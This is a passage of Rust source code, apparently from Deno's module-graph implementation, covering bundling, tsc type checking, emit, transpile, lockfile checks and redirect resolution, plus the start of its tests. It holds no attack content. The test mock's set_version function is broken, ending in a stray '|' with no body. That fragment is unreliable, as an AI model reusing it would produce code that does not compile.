/// Do not bundle the emit, instead returning each of the modules that are
/// part of the program as individual files.
None,
}
impl Default for BundleType {
fn default() -> Self {
BundleType::None
}
}
#[derive(Debug, Default)]
pub struct EmitOptions {
/// Indicate the form the result of the emit should take.
pub bundle_type: BundleType,
/// If `true` then debug logging will be output from the isolate.
pub debug: bool,
/// An optional map that contains user supplied TypeScript compiler
/// configuration options that are passed to the TypeScript compiler.
pub maybe_user_config: Option<HashMap<String, Value>>,
}
/// A structure which provides options when transpiling modules.
#[derive(Debug, Default)]
pub struct TranspileOptions {
/// If `true` then debug logging will be output from the isolate.
pub debug: bool,
/// An optional string that points to a user supplied TypeScript configuration
  /// file that augments the default configuration passed to the TypeScript
/// compiler.
pub maybe_config_path: Option<String>,
  /// Ignore any previous emits and ensure that all files are emitted from
/// source.
pub reload: bool,
}
/// A dependency graph of modules, where the modules that have been inserted via
/// the builder will be loaded into the graph. Also provides an interface to
/// be able to manipulate and handle the graph.
#[derive(Debug, Clone)]
pub struct Graph2 {
/// A reference to the specifier handler that will retrieve and cache modules
/// for the graph.
handler: Rc<RefCell<dyn SpecifierHandler>>,
/// Optional TypeScript build info that will be passed to `tsc` if `tsc` is
/// invoked.
maybe_tsbuildinfo: Option<String>,
/// The modules that are part of the graph.
modules: HashMap<ModuleSpecifier, Module>,
/// A map of redirects, where a module specifier is redirected to another
  /// module specifier by the handler. All module references should be
  /// resolved internally via this, before attempting to access the module via
  /// the handler, to make sure the correct module is being dealt with.
redirects: HashMap<ModuleSpecifier, ModuleSpecifier>,
/// The module specifiers that have been uniquely added to the graph, which
  /// does not include any transitive dependencies.
roots: Vec<ModuleSpecifier>,
/// If all of the root modules are dynamically imported, then this is true.
/// This is used to ensure correct `--reload` behavior, where subsequent
/// calls to a module graph where the emit is already valid do not cause the
/// graph to re-emit.
roots_dynamic: bool,
  /// A reference to the lockfile that will be used to check module integrity.
maybe_lockfile: Option<Arc<Mutex<Lockfile>>>,
}
impl Graph2 {
  /// Create a new instance of a graph, ready to have modules loaded into it.
///
/// The argument `handler` is an instance of a structure that implements the
/// `SpecifierHandler` trait.
///
pub fn new(
handler: Rc<RefCell<dyn SpecifierHandler>>,
maybe_lockfile: Option<Arc<Mutex<Lockfile>>>,
) -> Self {
Graph2 {
handler,
maybe_tsbuildinfo: None,
modules: HashMap::new(),
redirects: HashMap::new(),
roots: Vec::new(),
roots_dynamic: true,
maybe_lockfile,
}
}
/// Transform the module graph into a single JavaScript module which is
/// returned as a `String` in the result.
pub fn bundle(
&self,
options: BundleOptions,
) -> Result<(String, Stats, Option<IgnoredCompilerOptions>), AnyError> {
if self.roots.is_empty() || self.roots.len() > 1 {
return Err(GraphError::NotSupported(format!("Bundling is only supported when there is a single root module in the graph. Found: {}", self.roots.len())).into());
}
let start = Instant::now();
let root_specifier = self.roots[0].clone();
let mut ts_config = TsConfig::new(json!({
"checkJs": false,
"emitDecoratorMetadata": false,
"inlineSourceMap": true,
"jsx": "react",
"jsxFactory": "React.createElement",
"jsxFragmentFactory": "React.Fragment",
}));
let maybe_ignored_options =
ts_config.merge_tsconfig(options.maybe_config_path)?;
let s = self.emit_bundle(&root_specifier, &ts_config.into())?;
let stats = Stats(vec![
("Files".to_string(), self.modules.len() as u128),
("Total time".to_string(), start.elapsed().as_millis()),
]);
Ok((s, stats, maybe_ignored_options))
}
/// Type check the module graph, corresponding to the options provided.
pub fn check(self, options: CheckOptions) -> Result<ResultInfo, AnyError> {
let mut config = TsConfig::new(json!({
"allowJs": true,
// TODO(@kitsonk) is this really needed?
"esModuleInterop": true,
// Enabled by default to align to transpile/swc defaults
"experimentalDecorators": true,
"incremental": true,
"isolatedModules": true,
"lib": options.lib,
"module": "esnext",
"strict": true,
"target": "esnext",
"tsBuildInfoFile": "deno:///.tsbuildinfo",
}));
if options.emit {
config.merge(&json!({
// TODO(@kitsonk) consider enabling this by default
// see: https://github.com/denoland/deno/issues/7732
"emitDecoratorMetadata": false,
"jsx": "react",
"inlineSourceMap": true,
"outDir": "deno://",
"removeComments": true,
}));
} else {
config.merge(&json!({
"noEmit": true,
}));
}
let maybe_ignored_options =
config.merge_tsconfig(options.maybe_config_path)?;
// Short circuit if none of the modules require an emit, or all of the
// modules that require an emit have a valid emit. There is also an edge
// case where there are multiple imports of a dynamic module during a
// single invocation, if that is the case, even if there is a reload, we
// will simply look at if the emit is invalid, to avoid two checks for the
// same programme.
if !self.needs_emit(&config)
|| (self.is_emit_valid(&config)
&& (!options.reload || self.roots_dynamic))
{
debug!("graph does not need to be checked or emitted.");
return Ok(ResultInfo {
maybe_ignored_options,
..Default::default()
});
}
// TODO(@kitsonk) not totally happy with this here, but this is the first
// point where we know we are actually going to check the program. If we
// moved it out of here, we wouldn't know until after the check has already
// happened, which isn't informative to the users.
for specifier in &self.roots {
info!("{} {}", colors::green("Check"), specifier);
}
let root_names = self.get_root_names();
let maybe_tsbuildinfo = self.maybe_tsbuildinfo.clone();
let hash_data =
vec![config.as_bytes(), version::DENO.as_bytes().to_owned()];
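    // Wrap the graph in an Rc<RefCell<_>> so it can be shared with the tsc
    // isolate and borrowed back mutably once the check has completed.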
let graph = Rc::new(RefCell::new(self));
let response = tsc2::exec(
js::compiler_isolate_init(),
tsc2::Request {
config: config.clone(),
debug: options.debug,
graph: graph.clone(),
hash_data,
maybe_tsbuildinfo,
root_names,
},
)?;
let mut graph = graph.borrow_mut();
graph.maybe_tsbuildinfo = response.maybe_tsbuildinfo;
// Only process changes to the graph if there are no diagnostics and there
// were files emitted.
if response.diagnostics.is_empty() && !response.emitted_files.is_empty() {
let mut codes = HashMap::new();
let mut maps = HashMap::new();
let check_js = config.get_check_js();
for emit in &response.emitted_files {
if let Some(specifiers) = &emit.maybe_specifiers {
assert!(specifiers.len() == 1, "Unexpected specifier length");
// The specifier emitted might not be the redirected specifier, and
// therefore we need to ensure it is the correct one.
let specifier = graph.resolve_specifier(&specifiers[0]);
// Sometimes if tsc sees a CommonJS file it will _helpfully_ output it
// to ESM, which we don't really want unless someone has enabled the
// check_js option.
if !check_js
&& graph.get_media_type(&specifier) == Some(MediaType::JavaScript)
{
debug!("skipping emit for {}", specifier);
continue;
}
match emit.media_type {
MediaType::JavaScript => {
codes.insert(specifier.clone(), emit.data.clone());
}
MediaType::SourceMap => {
maps.insert(specifier.clone(), emit.data.clone());
}
_ => unreachable!(),
}
}
}
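      // Re-hash the config to bytes so each updated module can record the
      // version of its new emit.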
let config = config.as_bytes();
for (specifier, code) in codes.iter() {
if let Some(module) = graph.get_module_mut(specifier) {
module.maybe_emit =
Some(Emit::Cli((code.clone(), maps.get(specifier).cloned())));
module.set_version(&config);
module.is_dirty = true;
} else {
return Err(GraphError::MissingSpecifier(specifier.clone()).into());
}
}
}
graph.flush()?;
Ok(ResultInfo {
diagnostics: response.diagnostics,
maybe_ignored_options,
stats: response.stats,
})
}
fn contains_module(&self, specifier: &ModuleSpecifier) -> bool {
let s = self.resolve_specifier(specifier);
self.modules.contains_key(s)
}
/// Emit the module graph in a specific format. This is specifically designed
/// to be an "all-in-one" API for access by the runtime, allowing both
/// emitting single modules as well as bundles, using Deno module resolution
/// or supplied sources.
pub fn emit(
self,
options: EmitOptions,
) -> Result<(HashMap<String, String>, ResultInfo), AnyError> {
let mut config = TsConfig::new(json!({
"allowJs": true,
// TODO(@kitsonk) consider enabling this by default
// see: https://github.com/denoland/deno/issues/7732
"emitDecoratorMetadata": false,
"esModuleInterop": true,
"experimentalDecorators": true,
"isolatedModules": true,
"jsx": "react",
"lib": TypeLib::DenoWindow,
"module": "esnext",
"strict": true,
"target": "esnext",
}));
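    // For an ES module bundle, tsc only produces diagnostics (`noEmit`) and
    // the actual output is generated by swc via `emit_bundle` below; for
    // `BundleType::None`, tsc emits each module and its source map itself.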
let opts = match options.bundle_type {
BundleType::Esm => json!({
"checkJs": false,
"inlineSourceMap": false,
"noEmit": true,
"jsxFactory": "React.createElement",
"jsxFragmentFactory": "React.Fragment",
}),
BundleType::None => json!({
"outDir": "deno://",
"removeComments": true,
"sourceMap": true,
}),
};
config.merge(&opts);
let maybe_ignored_options =
if let Some(user_options) = &options.maybe_user_config {
config.merge_user_config(user_options)?
} else {
None
};
let root_names = self.get_root_names();
let hash_data =
vec![config.as_bytes(), version::DENO.as_bytes().to_owned()];
let graph = Rc::new(RefCell::new(self));
let response = tsc2::exec(
js::compiler_isolate_init(),
tsc2::Request {
config: config.clone(),
debug: options.debug,
graph: graph.clone(),
hash_data,
maybe_tsbuildinfo: None,
root_names,
},
)?;
let mut emitted_files = HashMap::new();
match options.bundle_type {
BundleType::Esm => {
assert!(
response.emitted_files.is_empty(),
"No files should have been emitted from tsc."
);
let graph = graph.borrow();
assert_eq!(
graph.roots.len(),
1,
"Only a single root module supported."
);
let specifier = &graph.roots[0];
let s = graph.emit_bundle(specifier, &config.into())?;
emitted_files.insert("deno:///bundle.js".to_string(), s);
}
BundleType::None => {
for emitted_file in &response.emitted_files {
assert!(
emitted_file.maybe_specifiers.is_some(),
"Orphaned file emitted."
);
let specifiers = emitted_file.maybe_specifiers.clone().unwrap();
assert_eq!(
specifiers.len(),
1,
"An unexpected number of specifiers associated with emitted file."
);
let specifier = specifiers[0].clone();
let extension = match emitted_file.media_type {
MediaType::JavaScript => ".js",
MediaType::SourceMap => ".js.map",
_ => unreachable!(),
};
let key = format!("{}{}", specifier, extension);
emitted_files.insert(key, emitted_file.data.clone());
}
}
};
Ok((
emitted_files,
ResultInfo {
diagnostics: response.diagnostics,
maybe_ignored_options,
stats: response.stats,
},
))
}
/// Shared between `bundle()` and `emit()`.
fn emit_bundle(
&self,
specifier: &ModuleSpecifier,
emit_options: &ast::EmitOptions,
) -> Result<String, AnyError> {
let cm = Rc::new(swc_common::SourceMap::new(
swc_common::FilePathMapping::empty(),
));
let globals = swc_common::Globals::new();
let loader = BundleLoader::new(self, emit_options, &globals, cm.clone());
let hook = Box::new(BundleHook);
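    // `self` acts as the module resolver here, because `Graph2` implements
    // `swc_bundler::Resolve` (see the impl further below).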
let bundler = swc_bundler::Bundler::new(
&globals,
cm.clone(),
loader,
self,
swc_bundler::Config::default(),
hook,
);
let mut entries = HashMap::new();
entries.insert(
"bundle".to_string(),
swc_common::FileName::Custom(specifier.to_string()),
);
let output = bundler
.bundle(entries)
.context("Unable to output bundle during Graph2::bundle().")?;
let mut buf = Vec::new();
{
let mut emitter = swc_ecmascript::codegen::Emitter {
cfg: swc_ecmascript::codegen::Config { minify: false },
cm: cm.clone(),
comments: None,
wr: Box::new(swc_ecmascript::codegen::text_writer::JsWriter::new(
cm, "\n", &mut buf, None,
)),
};
emitter
.emit_module(&output[0].module)
.context("Unable to emit bundle during Graph2::bundle().")?;
}
String::from_utf8(buf).context("Emitted bundle is an invalid utf-8 string.")
}
/// Update the handler with any modules that are marked as _dirty_ and update
/// any build info if present.
fn flush(&mut self) -> Result<(), AnyError> {
let mut handler = self.handler.borrow_mut();
for (_, module) in self.modules.iter_mut() {
if module.is_dirty {
if let Some(emit) = &module.maybe_emit {
handler.set_cache(&module.specifier, emit)?;
}
if let Some(version) = &module.maybe_version {
handler.set_version(&module.specifier, version.clone())?;
}
module.is_dirty = false;
}
}
for root_specifier in self.roots.iter() {
if let Some(tsbuildinfo) = &self.maybe_tsbuildinfo {
handler.set_tsbuildinfo(root_specifier, tsbuildinfo.to_owned())?;
}
}
Ok(())
}
fn get_info(
&self,
specifier: &ModuleSpecifier,
seen: &mut HashSet<ModuleSpecifier>,
totals: &mut HashMap<ModuleSpecifier, usize>,
) -> ModuleInfo {
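    // `insert` returns `true` only when this specifier has not been visited yet.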
let not_seen = seen.insert(specifier.clone());
let module = self.get_module(specifier).unwrap();
let mut deps = Vec::new();
let mut total_size = None;
if not_seen {
let mut seen_deps = HashSet::new();
// TODO(@kitsonk) https://github.com/denoland/deno/issues/7927
for (_, dep) in module.dependencies.iter() {
// Check the runtime code dependency
if let Some(code_dep) = &dep.maybe_code {
if seen_deps.insert(code_dep.clone()) {
deps.push(self.get_info(code_dep, seen, totals));
}
}
}
deps.sort();
total_size = if let Some(total) = totals.get(specifier) {
Some(total.to_owned())
} else {
let mut total = deps
.iter()
.map(|d| {
if let Some(total_size) = d.total_size {
total_size
} else {
0
}
})
.sum();
total += module.size();
totals.insert(specifier.clone(), total);
Some(total)
};
}
ModuleInfo {
deps,
name: specifier.clone(),
size: module.size(),
total_size,
}
}
fn get_info_map(&self) -> ModuleInfoMap {
let map = self
.modules
.iter()
.map(|(specifier, module)| {
let mut deps = HashSet::new();
for (_, dep) in module.dependencies.iter() {
if let Some(code_dep) = &dep.maybe_code {
deps.insert(code_dep.clone());
}
if let Some(type_dep) = &dep.maybe_type {
deps.insert(type_dep.clone());
}
}
if let Some((_, types_dep)) = &module.maybe_types {
deps.insert(types_dep.clone());
}
let item = ModuleInfoMapItem {
deps: deps.into_iter().collect(),
size: module.size(),
};
(specifier.clone(), item)
})
.collect();
ModuleInfoMap::new(map)
}
pub fn get_media_type(
&self,
specifier: &ModuleSpecifier,
) -> Option<MediaType> {
if let Some(module) = self.get_module(specifier) {
Some(module.media_type)
} else {
None
}
}
fn get_module(&self, specifier: &ModuleSpecifier) -> Option<&Module> {
let s = self.resolve_specifier(specifier);
self.modules.get(s)
}
fn get_module_mut(
&mut self,
specifier: &ModuleSpecifier,
) -> Option<&mut Module> {
    // This duplicates `.resolve_specifier` because that method requires an
    // immutable borrow; if `.resolve_specifier` took `&mut self`, then
    // everything that calls it would also have to be mutable.
let mut s = specifier;
while let Some(redirect) = self.redirects.get(s) {
s = redirect;
}
self.modules.get_mut(s)
}
  /// Return a list of all module specifiers contained in the graph.
pub fn get_modules(&self) -> Vec<ModuleSpecifier> {
self.modules.keys().map(|s| s.to_owned()).collect()
}
/// Transform `self.roots` into something that works for `tsc`, because `tsc`
/// doesn't like root names without extensions that match its expectations,
/// nor does it have any concept of redirection, so we have to resolve all
/// that upfront before feeding it to `tsc`.
fn get_root_names(&self) -> Vec<(ModuleSpecifier, MediaType)> {
self
.roots
.iter()
.map(|ms| {
(
// root modules can be redirects, so before we pass it to tsc we need
// to resolve the redirect
self.resolve_specifier(ms).clone(),
self.get_media_type(ms).unwrap(),
)
})
.collect()
}
/// Get the source for a given module specifier. If the module is not part
/// of the graph, the result will be `None`.
pub fn get_source(&self, specifier: &ModuleSpecifier) -> Option<String> {
if let Some(module) = self.get_module(specifier) {
Some(module.source.clone())
} else {
None
}
}
/// Return a structure which provides information about the module graph and
/// the relationship of the modules in the graph. This structure is used to
/// provide information for the `info` subcommand.
pub fn info(&self) -> Result<ModuleGraphInfo, AnyError> {
if self.roots.is_empty() || self.roots.len() > 1 {
return Err(GraphError::NotSupported(format!("Info is only supported when there is a single root module in the graph. Found: {}", self.roots.len())).into());
}
let module = self.roots[0].clone();
let m = self.get_module(&module).unwrap();
let mut seen = HashSet::new();
let mut totals = HashMap::new();
let info = self.get_info(&module, &mut seen, &mut totals);
let files = self.get_info_map();
let total_size = totals.get(&module).unwrap_or(&m.size()).to_owned();
let (compiled, map) =
if let Some((emit_path, maybe_map_path)) = &m.maybe_emit_path {
(Some(emit_path.clone()), maybe_map_path.clone())
} else {
(None, None)
};
Ok(ModuleGraphInfo {
compiled,
dep_count: self.modules.len() - 1,
file_type: m.media_type,
files,
info,
local: m.source_path.clone(),
map,
module,
total_size,
})
}
/// Determines if all of the modules in the graph that require an emit have
/// a valid emit. Returns `true` if all the modules have a valid emit,
/// otherwise false.
fn is_emit_valid(&self, config: &TsConfig) -> bool {
let check_js = config.get_check_js();
let config = config.as_bytes();
self.modules.iter().all(|(_, m)| {
let needs_emit = match m.media_type {
MediaType::TypeScript | MediaType::TSX | MediaType::JSX => true,
MediaType::JavaScript => check_js,
_ => false,
};
if needs_emit {
m.is_emit_valid(&config)
} else {
true
}
})
}
/// Verify the subresource integrity of the graph based upon the optional
/// lockfile, updating the lockfile with any missing resources. This will
/// error if any of the resources do not match their lock status.
pub fn lock(&self) {
if let Some(lf) = self.maybe_lockfile.as_ref() {
let mut lockfile = lf.lock().unwrap();
for (ms, module) in self.modules.iter() {
let specifier = module.specifier.to_string();
let valid = lockfile.check_or_insert(&specifier, &module.source);
if !valid {
eprintln!(
"{}",
GraphError::InvalidSource(ms.clone(), lockfile.filename.clone())
);
std::process::exit(10);
}
}
}
}
/// Determines if any of the modules in the graph are required to be emitted.
  /// This is similar to `is_emit_valid()` except that the actual emit isn't
/// checked to determine if it is valid.
fn needs_emit(&self, config: &TsConfig) -> bool {
let check_js = config.get_check_js();
self.modules.iter().any(|(_, m)| match m.media_type {
MediaType::TypeScript | MediaType::TSX | MediaType::JSX => true,
MediaType::JavaScript => check_js,
_ => false,
})
}
/// Given a string specifier and a referring module specifier, provide the
/// resulting module specifier and media type for the module that is part of
/// the graph.
///
/// # Arguments
///
/// * `specifier` - The string form of the module specifier that needs to be
/// resolved.
/// * `referrer` - The referring `ModuleSpecifier`.
/// * `prefer_types` - When resolving to a module specifier, determine if a
/// type dependency is preferred over a code dependency. This is set to
/// `true` when resolving module names for `tsc` as it needs the type
/// dependency over the code, while other consumers do not handle type only
/// dependencies.
pub fn resolve(
&self,
specifier: &str,
referrer: &ModuleSpecifier,
prefer_types: bool,
) -> Result<ModuleSpecifier, AnyError> {
if !self.contains_module(referrer) {
return Err(GraphError::MissingSpecifier(referrer.to_owned()).into());
}
let module = self.get_module(referrer).unwrap();
if !module.dependencies.contains_key(specifier) {
return Err(
GraphError::MissingDependency(
referrer.to_owned(),
specifier.to_owned(),
)
.into(),
);
}
let dependency = module.dependencies.get(specifier).unwrap();
// If there is a @deno-types pragma that impacts the dependency, then the
// maybe_type property will be set with that specifier, otherwise we use the
    // specifier that points to the runtime code.
let resolved_specifier = if prefer_types && dependency.maybe_type.is_some()
{
dependency.maybe_type.clone().unwrap()
} else if let Some(code_specifier) = dependency.maybe_code.clone() {
code_specifier
} else {
return Err(
GraphError::MissingDependency(
referrer.to_owned(),
specifier.to_owned(),
)
.into(),
);
};
if !self.contains_module(&resolved_specifier) {
return Err(
GraphError::MissingDependency(
referrer.to_owned(),
resolved_specifier.to_string(),
)
.into(),
);
}
let dep_module = self.get_module(&resolved_specifier).unwrap();
// In the case that there is a X-TypeScript-Types or a triple-slash types,
// then the `maybe_types` specifier will be populated and we should use that
// instead.
let result = if prefer_types && dep_module.maybe_types.is_some() {
let (_, types) = dep_module.maybe_types.clone().unwrap();
// It is possible that `types` points to a redirected specifier, so we
// need to ensure it resolves to the final specifier in the graph.
self.resolve_specifier(&types).clone()
} else {
dep_module.specifier.clone()
};
Ok(result)
}
/// Takes a module specifier and returns the "final" specifier, accounting for
/// any redirects that may have occurred.
fn resolve_specifier<'a>(
&'a self,
specifier: &'a ModuleSpecifier,
) -> &'a ModuleSpecifier {
let mut s = specifier;
let mut seen = HashSet::new();
seen.insert(s.clone());
while let Some(redirect) = self.redirects.get(s) {
if !seen.insert(redirect.clone()) {
eprintln!("An infinite loop of module redirections detected.\n Original specifier: {}", specifier);
break;
}
s = redirect;
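      // Also cap the number of redirect hops as a safety net against
      // excessively long chains.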
if seen.len() > 5 {
eprintln!("An excessive number of module redirections detected.\n Original specifier: {}", specifier);
break;
}
}
s
}
/// Transpile (only transform) the graph, updating any emitted modules
/// with the specifier handler. The result contains any performance stats
/// from the compiler and optionally any user provided configuration compiler
/// options that were ignored.
///
/// # Arguments
///
/// * `options` - A structure of options which impact how the code is
/// transpiled.
///
pub fn transpile(
&mut self,
options: TranspileOptions,
) -> Result<(Stats, Option<IgnoredCompilerOptions>), AnyError> {
let start = Instant::now();
let mut ts_config = TsConfig::new(json!({
"checkJs": false,
"emitDecoratorMetadata": false,
"inlineSourceMap": true,
"jsx": "react",
"jsxFactory": "React.createElement",
"jsxFragmentFactory": "React.Fragment",
}));
let maybe_ignored_options =
ts_config.merge_tsconfig(options.maybe_config_path)?;
let emit_options: ast::EmitOptions = ts_config.clone().into();
let mut emit_count: u128 = 0;
let config = ts_config.as_bytes();
for (_, module) in self.modules.iter_mut() {
// TODO(kitsonk) a lot of this logic should be refactored into `Module` as
// we start to support other methods on the graph. Especially managing
// the dirty state is something the module itself should "own".
// if the module is a Dts file we should skip it
if module.media_type == MediaType::Dts {
continue;
}
// if we don't have check_js enabled, we won't touch non TypeScript
// modules
if !(emit_options.check_js
|| module.media_type == MediaType::TSX
|| module.media_type == MediaType::TypeScript)
{
continue;
}
// skip modules that already have a valid emit
if !options.reload && module.is_emit_valid(&config) {
continue;
}
if module.maybe_parsed_module.is_none() {
module.parse()?;
}
let parsed_module = module.maybe_parsed_module.clone().unwrap();
let emit = parsed_module.transpile(&emit_options)?;
emit_count += 1;
module.maybe_emit = Some(Emit::Cli(emit));
module.set_version(&config);
module.is_dirty = true;
}
self.flush()?;
let stats = Stats(vec![
("Files".to_string(), self.modules.len() as u128),
("Emitted".to_string(), emit_count),
("Total time".to_string(), start.elapsed().as_millis()),
]);
Ok((stats, maybe_ignored_options))
}
}
impl swc_bundler::Resolve for Graph2 {
fn resolve(
&self,
referrer: &swc_common::FileName,
specifier: &str,
) -> Result<swc_common::FileName, AnyError> {
let referrer = if let swc_common::FileName::Custom(referrer) = referrer {
ModuleSpecifier::resolve_url_or_path(referrer)
.context("Cannot resolve swc FileName to a module specifier")?
} else {
unreachable!(
"An unexpected referrer was passed when bundling: {:?}",
referrer
)
};
let specifier = self.resolve(specifier, &referrer, false)?;
Ok(swc_common::FileName::Custom(specifier.to_string()))
}
}
/// A structure for building a dependency graph of modules.
pub struct GraphBuilder2 {
fetched: HashSet<ModuleSpecifier>,
graph: Graph2,
maybe_import_map: Option<Rc<RefCell<ImportMap>>>,
pending: FuturesUnordered<FetchFuture>,
}
impl GraphBuilder2 {
pub fn new(
handler: Rc<RefCell<dyn SpecifierHandler>>,
maybe_import_map: Option<ImportMap>,
maybe_lockfile: Option<Arc<Mutex<Lockfile>>>,
) -> Self {
let internal_import_map = if let Some(import_map) = maybe_import_map {
Some(Rc::new(RefCell::new(import_map)))
} else {
None
};
GraphBuilder2 {
graph: Graph2::new(handler, maybe_lockfile),
fetched: HashSet::new(),
maybe_import_map: internal_import_map,
pending: FuturesUnordered::new(),
}
}
/// Add a module into the graph based on a module specifier. The module
/// and any dependencies will be fetched from the handler. The module will
/// also be treated as a _root_ module in the graph.
pub async fn add(
&mut self,
specifier: &ModuleSpecifier,
is_dynamic: bool,
) -> Result<(), AnyError> {
self.fetch(specifier, &None, is_dynamic)?;
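    // Drain the queue of pending fetches; `visit` can enqueue more work as
    // new dependencies are discovered.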
loop {
let cached_module = self.pending.next().await.unwrap()?;
let is_root = &cached_module.specifier == specifier;
self.visit(cached_module, is_root)?;
if self.pending.is_empty() {
break;
}
}
if !self.graph.roots.contains(specifier) {
self.graph.roots.push(specifier.clone());
self.graph.roots_dynamic = self.graph.roots_dynamic && is_dynamic;
if self.graph.maybe_tsbuildinfo.is_none() {
let handler = self.graph.handler.borrow();
self.graph.maybe_tsbuildinfo = handler.get_tsbuildinfo(specifier)?;
}
}
Ok(())
}
  /// Request a module to be fetched from the handler and queue up its future
  /// so it can be awaited and resolved later.
fn fetch(
&mut self,
specifier: &ModuleSpecifier,
maybe_referrer: &Option<Location>,
is_dynamic: bool,
) -> Result<(), AnyError> {
if self.fetched.contains(&specifier) {
return Ok(());
}
self.fetched.insert(specifier.clone());
let future = self.graph.handler.borrow_mut().fetch(
specifier.clone(),
maybe_referrer.clone(),
is_dynamic,
);
self.pending.push(future);
Ok(())
}
/// Visit a module that has been fetched, hydrating the module, analyzing its
/// dependencies if required, fetching those dependencies, and inserting the
/// module into the graph.
fn visit(
&mut self,
cached_module: CachedModule,
is_root: bool,
) -> Result<(), AnyError> {
let specifier = cached_module.specifier.clone();
let requested_specifier = cached_module.requested_specifier.clone();
let mut module =
Module::new(cached_module, is_root, self.maybe_import_map.clone());
match module.media_type {
MediaType::Json
| MediaType::SourceMap
| MediaType::TsBuildInfo
| MediaType::Unknown => {
return Err(
GraphError::UnsupportedImportType(
module.specifier,
module.media_type,
)
.into(),
);
}
_ => (),
}
if !module.is_parsed {
let has_types = module.maybe_types.is_some();
module.parse()?;
if self.maybe_import_map.is_none() {
let mut handler = self.graph.handler.borrow_mut();
handler.set_deps(&specifier, module.dependencies.clone())?;
if !has_types {
if let Some((types, _)) = module.maybe_types.clone() {
handler.set_types(&specifier, types)?;
}
}
}
}
for (_, dep) in module.dependencies.iter() {
let maybe_referrer = Some(dep.location.clone());
if let Some(specifier) = dep.maybe_code.as_ref() {
self.fetch(specifier, &maybe_referrer, dep.is_dynamic)?;
}
if let Some(specifier) = dep.maybe_type.as_ref() {
self.fetch(specifier, &maybe_referrer, dep.is_dynamic)?;
}
}
if let Some((_, specifier)) = module.maybe_types.as_ref() {
self.fetch(specifier, &None, false)?;
}
if specifier != requested_specifier {
self
.graph
.redirects
.insert(requested_specifier, specifier.clone());
}
self.graph.modules.insert(specifier, module);
Ok(())
}
  /// Move the graph out of the builder for further use. If a lockfile was
  /// provided, any sources in the graph that do not match it will be logged
  /// as an error and the process will exit.
pub fn get_graph(self) -> Graph2 {
self.graph.lock();
self.graph
}
}
#[cfg(test)]
pub mod tests {
use super::*;
use crate::specifier_handler::MemoryHandler;
use deno_core::futures::future;
use std::env;
use std::fs;
use std::path::PathBuf;
use std::sync::Mutex;
macro_rules! map (
{ $($key:expr => $value:expr),+ } => {
{
let mut m = ::std::collections::HashMap::new();
$(
m.insert($key, $value);
)+
m
}
};
);
  /// This is a testing mock for `SpecifierHandler` that uses a special
  /// file-system renaming scheme to mock local and remote modules, and
  /// provides "spies" on the critical methods for testing purposes.
#[derive(Debug, Default)]
pub struct MockSpecifierHandler {
pub fixtures: PathBuf,
pub maybe_tsbuildinfo: Option<String>,
pub tsbuildinfo_calls: Vec<(ModuleSpecifier, String)>,
pub cache_calls: Vec<(ModuleSpecifier, Emit)>,
pub deps_calls: Vec<(ModuleSpecifier, DependencyMap)>,
pub types_calls: Vec<(ModuleSpecifier, String)>,
pub version_calls: Vec<(ModuleSpecifier, String)>,
}
impl MockSpecifierHandler {
fn get_cache(
&self,
specifier: ModuleSpecifier,
) -> Result<CachedModule, AnyError> {
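      // Flatten the specifier into a fixture file name, e.g.
      // "file:///tests/main.ts" becomes "file_tests-main.ts".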
let specifier_text = specifier
.to_string()
.replace(":///", "_")
.replace("://", "_")
.replace("/", "-");
let source_path = self.fixtures.join(specifier_text);
let media_type = MediaType::from(&source_path);
let source = fs::read_to_string(&source_path)?;
let is_remote = specifier.as_url().scheme() != "file";
Ok(CachedModule {
source,
requested_specifier: specifier.clone(),
source_path,
specifier,
media_type,
is_remote,
..CachedModule::default()
})
}
}
impl SpecifierHandler for MockSpecifierHandler {
fn fetch(
&mut self,
specifier: ModuleSpecifier,
_maybe_referrer: Option<Location>,
_is_dynamic: bool,
) -> FetchFuture {
Box::pin(future::ready(self.get_cache(specifier)))
}
fn get_tsbuildinfo(
&self,
_specifier: &ModuleSpecifier,
) -> Result<Option<String>, AnyError> {
Ok(self.maybe_tsbuildinfo.clone())
}
fn set_cache(
&mut self,
specifier: &ModuleSpecifier,
emit: &Emit,
) -> Result<(), AnyError> {
self.cache_calls.push((specifier.clone(), emit.clone()));
Ok(())
}
fn set_types(
&mut self,
specifier: &ModuleSpecifier,
types: String,
) -> Result<(), AnyError> {
self.types_calls.push((specifier.clone(), types));
Ok(())
}
fn set_tsbuildinfo(
&mut self,
specifier: &ModuleSpecifier,
tsbuildinfo: String,
) -> Result<(), AnyError> {
self.maybe_tsbuildinfo = Some(tsbuildinfo.clone());
self
.tsbuildinfo_calls
.push((specifier.clone(), tsbuildinfo));
Ok(())
}
fn set_deps(
&mut self,
specifier: &ModuleSpecifier,
dependencies: DependencyMap,
) -> Result<(), AnyError> {
self.deps_calls.push((specifier.clone(), dependencies));
Ok(())
}
fn set_version(
&mut self,
specifier: &ModuleSpecifier,
version: String,
) -> Result<(), AnyError> |
}
async fn setup(
specifier: ModuleSpecifier,
) -> (Graph2, Rc<RefCell<MockSpecifierHandler>>) {
let c = PathBuf::from(env::var_os("CARGO_MANIFEST_DIR").unwrap());
let fixtures = c.join("tests/module_graph");
let handler = Rc::new(RefCell::new(MockSpecifierHandler {
fixtures,
..MockSpecifierHandler::default()
}));
let mut builder = GraphBuilder2::new(handler.clone(), None, None);
builder
.add(&specifier, false)
.await
.expect("module not inserted");
(builder.get_graph(), handler)
}
async fn setup_memory(
specifier: ModuleSpecifier,
sources: HashMap<&str, &str>,
) -> Graph2 {
let sources: HashMap<String, String> = sources
.iter()
.map(|(k, v)| (k.to_string(), v.to_string()))
.collect();
let handler = Rc::new(RefCell::new(MemoryHandler::new(sources)));
let mut builder = GraphBuilder2::new(handler.clone(), None, None);
builder
.add(&specifier, false)
.await
.expect("module not inserted");
builder.get_graph()
}
#[test]
fn test_get_version() {
let doc_a = "console.log(42);";
let version_a = get_version(&doc_a, "1.2.3", b"");
let doc_b = "console.log(42);";
let version_b = get_version(&doc_b, "1.2.3", b"");
assert_eq!(version_a, version_b);
let version_c = get_version(&doc_a, "1.2.3", b"options");
assert_ne!(version_a, version_c);
let version_d = get_version(&doc_b, "1.2.3", b"options");
assert_eq!(version_c, version_d);
let version_e = get_version(&doc_a, "1.2.4", b"");
assert_ne!(version_a, version_e);
let version_f = get_version(&doc_b, "1.2.4", b"");
assert_eq!(version_e, version_f);
}
#[test]
fn test_module_emit_valid() {
let source = "console.log(42);".to_string();
let maybe_version = Some(get_version(&source, version::DENO, b""));
let module = Module {
source,
maybe_version,
..Module::default()
};
assert!(module.is_emit_valid(b""));
let source = "console.log(42);".to_string();
let old_source = "console.log(43);";
let maybe_version = Some(get_version(old_source, version::DENO, b""));
let module = Module {
source,
